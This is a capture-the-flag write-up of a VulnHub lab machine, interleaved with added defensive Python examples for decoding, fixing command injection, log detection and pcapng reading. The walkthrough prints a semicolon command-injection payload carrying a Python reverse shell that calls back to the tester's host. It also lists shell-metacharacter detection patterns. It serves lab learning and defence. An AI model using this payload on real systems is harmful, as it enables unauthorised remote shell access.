After downloading the machine I just had to open it in VMware. As an FYI, its network adapter is set to Bridged by default; you can change this in the network settings.
First things first, I performed an nmap scan as usual. The first result showed all ports closed, so I went a bit deeper and scanned all 65535 ports. After a while (yeah, I know) the report showed only 1 port open: TCP port 33447, running Apache.
It is worth noticing the /Challenge path included in the nmap report. We will see more of that later. In the meantime, the main site looks like this:
Not much to see. I decided to check the page source looking for some hints, and at the bottom of the page there was a hex-encoded string attached:
Decoding the hex yields a base64 string:
which, decoded again, turns into wow.jpg.
I navigated to the common images folder, /images/, and there it was: wow.jpg. I downloaded it, but checking it with strings and exiftool didn't show anything interesting.
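The two-step decoding above (hex, then base64) is a common way to bury a hint in page source. The following is an added example, not code from the original write-up: a small decoder that peels such layers one at a time, trying hex before base64 because a hex string is also valid base64 alphabet and would otherwise decode to garbage. The sample input is constructed from the value the page ends up with ("wow.jpg"); the real string from the page source is not reproduced here.

```python
import base64
import binascii
import string

PRINTABLE = set(string.printable)


def looks_printable(data: bytes) -> bool:
    """True if the bytes are plain ASCII text; used to decide whether a decoding step 'worked'."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    return all(c in PRINTABLE for c in text)


def try_hex(data: bytes):
    """Decode a hex string, or return None if it is not valid hex."""
    s = data.strip()
    if len(s) < 2 or len(s) % 2:
        return None
    try:
        return binascii.unhexlify(s)
    except (binascii.Error, ValueError):
        return None


def try_base64(data: bytes):
    """Decode strict base64 (proper alphabet and padding), or return None."""
    s = data.strip()
    if len(s) < 4 or len(s) % 4:
        return None
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def peel_layers(blob: str, max_depth: int = 8):
    """Repeatedly strip hex/base64 layers while the result stays printable.

    Returns (final_text, [layer names in the order they were removed]).
    Hex is tried first: a hex string passes base64 validation too, but the
    reverse is rarely true, so this order avoids a false base64 step.
    """
    data = blob.encode("ascii")
    layers = []
    for _ in range(max_depth):
        for name, decoder in (("hex", try_hex), ("base64", try_base64)):
            out = decoder(data)
            if out is not None and out != data and looks_printable(out):
                data = out
                layers.append(name)
                break
        else:
            break  # neither decoder produced readable text: stop
    return data.decode("ascii"), layers


# Constructed sample: hex(base64("wow.jpg")). The page's actual string is not reproduced.
SAMPLE = "643239334c6d70775a773d3d"

if __name__ == "__main__":
    text, layers = peel_layers(SAMPLE)
    print(layers, "->", text)
```

Running it on the constructed sample reports the layers removed (`['hex', 'base64']`) and the final text `wow.jpg`; feeding it a string that is neither hex nor base64 returns the input unchanged with an empty layer list.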
Remember that /Challenge/ folder? Yeah, about time to double check it.
We are presented with a charming message:
I tried some SQLi but it seems the form is not vulnerable. Later I figured out that this form has default credentials that are available to anyone. Anyways...
At this point there was not much to keep moving with, so I fired up DirBuster looking for some new folders to sniff around in. After a while it discovered 4 new files under the /Challenge/ directory:
- protected_page.php shows nothing as I'm not logged in.
- hacked.php shows a form to enter an ID; I tried a few things on this one, nothing worked.
- cake.php apparently only contains a message, but if you take a look at the page title, it shows "/Magic_Box", which seems to be another path.
I gave DirBuster (one of my favorite tools) another round and it discovered a few new paths; /Magic_Box was indeed another directory:
- low.php showed absolutely nothing (blank page)
- tails.php asks for a key to open the "Magical Doors"
- command.php seems very interesting.
Checking command.php, it shows an interesting message and also has a form to submit an IP address. However, the response was always the same, so I decided to inspect the request and response in the background using Burp Suite; the application has the IP parameter, as seen:
After reading about separating commands with a semicolon (;) in this article:
I decided to try it here and wait for the response:
The next step is to obtain a reverse shell by using this command injection to execute commands. After researching reverse shells I tried a few without luck; after more research I came up with this code, which worked smoothly and gave me access to the system. Of course, a netcat listener is required beforehand:
;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.182.128",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&submit=submit
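The root cause here is that command.php hands the IP parameter to a shell, so a semicolon ends the intended command and starts the attacker's. The following is an added example, not the machine's code: it shows the vulnerable pattern as a string builder (assumed from the behaviour described above, since command.php's source is not on the page), a hardened version that validates the value as an IP address and never goes through a shell, and a log check that flags query parameters carrying shell metacharacters. The log lines are constructed; the paths and parameter name are the ones from the write-up.

```python
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# Characters that let a value escape from a shell command string.
SHELL_META = re.compile(r"[;&|`$()<>\n]")


def vulnerable_ping_command(ip: str) -> str:
    """Assumed shape of the bug: user input pasted into a shell string.

    With ip = "10.0.0.1;id" the shell runs ping, then id. Shown only as the
    'before'; nothing here executes it.
    """
    return f"ping -c 1 {ip}"


def is_valid_ip(value: str) -> bool:
    """Accept only a syntactically valid IPv4/IPv6 address (no host names)."""
    try:
        ipaddress.ip_address(value.strip())
    except ValueError:
        return False
    return True


def safe_ping_argv(value: str):
    """Hardened form: validate first, then build an argument list (no shell)."""
    if not is_valid_ip(value):
        raise ValueError("IP parameter is not an IP address")
    return ["ping", "-c", "1", value.strip()]


def run_ping(value: str) -> str:
    """Execute the validated command with subprocess and an argv list.

    shell=False is the default, so metacharacters in value can never be
    interpreted; the validation above rejects them anyway.
    """
    result = subprocess.run(safe_ping_argv(value), capture_output=True,
                            text=True, timeout=10)
    return result.stdout


# --- detection side: look for injection attempts in access logs ---
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_params(line: str):
    """Return (param, value) pairs from a combined-format log line whose
    decoded value contains shell metacharacters. Only the query string is
    visible here; POST bodies need request-body logging (e.g. a WAF audit log).
    """
    m = LOG_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    for key, values in parse_qs(query, keep_blank_values=True).items():
        for v in values:
            if SHELL_META.search(v):
                hits.append((key, v))
    return hits


# Constructed log lines (not from the machine); the first is benign, the second is not.
LOG_LINES = [
    '192.168.182.128 - - [01/Jan/2018:10:00:00 +0000] '
    '"GET /Challenge/Magic_Box/command.php?IP=10.0.0.1&submit=submit HTTP/1.1" 200 512',
    '192.168.182.128 - - [01/Jan/2018:10:00:05 +0000] '
    '"GET /Challenge/Magic_Box/command.php?IP=10.0.0.1%3Bid&submit=submit HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    print(vulnerable_ping_command("10.0.0.1;id"))   # ping -c 1 10.0.0.1;id
    print(safe_ping_argv("10.0.0.1"))               # ['ping', '-c', '1', '10.0.0.1']
    for line in LOG_LINES:
        print(suspicious_params(line))
```

The two fixes are independent and both worth having: validating the value closes this parameter, while passing an argv list instead of a shell string closes the whole class of bug for any other parameter the page may add later.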
After sniffing around in the /home/ folder I found 2 users on the system:
I decided to keep looking for literally ANYTHING, and after a while I found a folder in / called /s.bin which had a file named "investigate.php".
Opening this file shows it contains the message: "Now you have to behave like an investigator to catch the culprit\n";
After taking a break, I went back to check for more hidden files in the filesystem, checking one by one for any weird file or folder that could give some extra help. In the process I found a folder in the /sbin/ directory named "/sbin/raw_vs_isi"; this folder contained a file "hint.pcapng".
pcapng is a packet capture format that can be opened with Wireshark; it looked something like this:
There was a lot of noise in the capture. After a while spent reading about Wireshark filters (I'm not an expert on them) I gave this one a try, to only see traffic whose source or destination port is 1337:
tcp.dstport == 1337 or tcp.srcport == 1337
After applying it, only the communication between .46 and .44 was displayed. Following the TCP stream, it had a curious message behind it:
It mentions the user I had already found by sniffing around the directories, saman, and also says that he is known by the alias 1337hax0r. I decided to try sudo su with these credentials and, lucky me, it worked fine; I didn't have to escalate privileges by looking for kernel vulnerabilities or the like.
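To make concrete what the display filter and "Follow TCP Stream" do under the hood, here is an added example that is not part of the original write-up: a minimal pcapng reader (section header, interface description and enhanced packet blocks only, little-endian) with an Ethernet/IPv4/TCP parser, which applies the equivalent of `tcp.dstport == 1337 or tcp.srcport == 1337` and concatenates each direction's payload. Because hint.pcapng itself is not on the page, the block builds its own small capture in memory; the addresses, ports and messages in it are constructed placeholders, not the real ones.

```python
import struct


# ---- constructed sample capture (builders; the real hint.pcapng is not reproduced) ----
def pcapng_block(btype, body):
    """Wrap a block body with its type and the leading/trailing total-length fields."""
    total = 12 + len(body)
    return struct.pack("<II", btype, total) + body + struct.pack("<I", total)


def tcp_frame(src, dst, sport, dport, payload):
    """Minimal Ethernet/IPv4/TCP frame (zero MACs, zero checksums) carrying payload."""
    eth = b"\x00" * 12 + b"\x08\x00"                              # EtherType IPv4
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def build_pcapng(frames):
    """SHB + one Ethernet IDB + one EPB per frame, little-endian section."""
    out = pcapng_block(0x0A0D0D0A, struct.pack("<IHHq", 0x1A2B3C4D, 1, 0, -1))
    out += pcapng_block(1, struct.pack("<HHI", 1, 0, 65535))       # LINKTYPE_ETHERNET
    for f in frames:
        pad = (-len(f)) % 4
        out += pcapng_block(6, struct.pack("<IIIII", 0, 0, 0, len(f), len(f)) + f + b"\x00" * pad)
    return out


# ---- reader side: what Wireshark's filter and Follow TCP Stream boil down to ----
def pcapng_packets(blob):
    """Yield raw frames from Enhanced Packet Blocks; other block types are skipped."""
    off = 0
    while off + 8 <= len(blob):
        btype, blen = struct.unpack_from("<II", blob, off)
        if blen < 12 or off + blen > len(blob):
            raise ValueError("truncated pcapng block")
        if btype == 6:
            _iface, _ts_hi, _ts_lo, caplen, _origlen = struct.unpack_from("<IIIII", blob, off + 8)
            yield blob[off + 28:off + 28 + caplen]
        off += blen


def parse_tcp(frame):
    """Return (src_ip, dst_ip, sport, dport, payload) for Ethernet/IPv4/TCP, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ihl = (frame[14] & 0x0F) * 4
    if frame[23] != 6:                                            # IP protocol != TCP
        return None
    ip_total = struct.unpack_from("!H", frame, 16)[0]
    src = ".".join(str(b) for b in frame[26:30])
    dst = ".".join(str(b) for b in frame[30:34])
    tcp = 14 + ihl
    sport, dport = struct.unpack_from("!HH", frame, tcp)
    doff = (frame[tcp + 12] >> 4) * 4
    return src, dst, sport, dport, frame[tcp + doff:14 + ip_total]


def follow_stream(blob, port):
    """Keep only segments with port as source or destination, then join each
    direction's payload in capture order: the two Wireshark steps from the post."""
    convo = {}
    for frame in pcapng_packets(blob):
        pkt = parse_tcp(frame)
        if pkt is None:
            continue
        src, dst, sport, dport, payload = pkt
        if port not in (sport, dport):
            continue
        convo.setdefault((src, sport, dst, dport), bytearray()).extend(payload)
    return {k: bytes(v) for k, v in convo.items()}


# Constructed traffic: one HTTP 'noise' segment plus a three-segment port-1337 exchange.
SAMPLE_PCAPNG = build_pcapng([
    tcp_frame("10.0.0.46", "10.0.0.44", 50000, 80, b"GET / HTTP/1.0\r\n\r\n"),
    tcp_frame("10.0.0.46", "10.0.0.44", 40000, 1337, b"hello from .46 (constructed)"),
    tcp_frame("10.0.0.44", "10.0.0.46", 1337, 40000, b"reply from .44 (constructed)"),
    tcp_frame("10.0.0.46", "10.0.0.44", 40000, 1337, b" -- second segment"),
])

if __name__ == "__main__":
    for (src, sport, dst, dport), data in follow_stream(SAMPLE_PCAPNG, 1337).items():
        print(f"{src}:{sport} -> {dst}:{dport}: {data!r}")
```

The reader deliberately ignores sequence numbers and reassembles in capture order, which is enough for a clean single-connection hint like this one; a real tool also sorts by sequence number and handles retransmissions, and checks the SHB byte-order magic rather than assuming little-endian as this block does.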
Now, all I had to do was capture the flag.txt located in the /root/ folder:
There it is. After finishing my OSCP certification I wanted to get my hands dirty with some good and safe environments to play with; thanks to +VulnHub that is possible.
I was stuck for a while, a lot of frustration but it was worth it :)
Thanks for reading.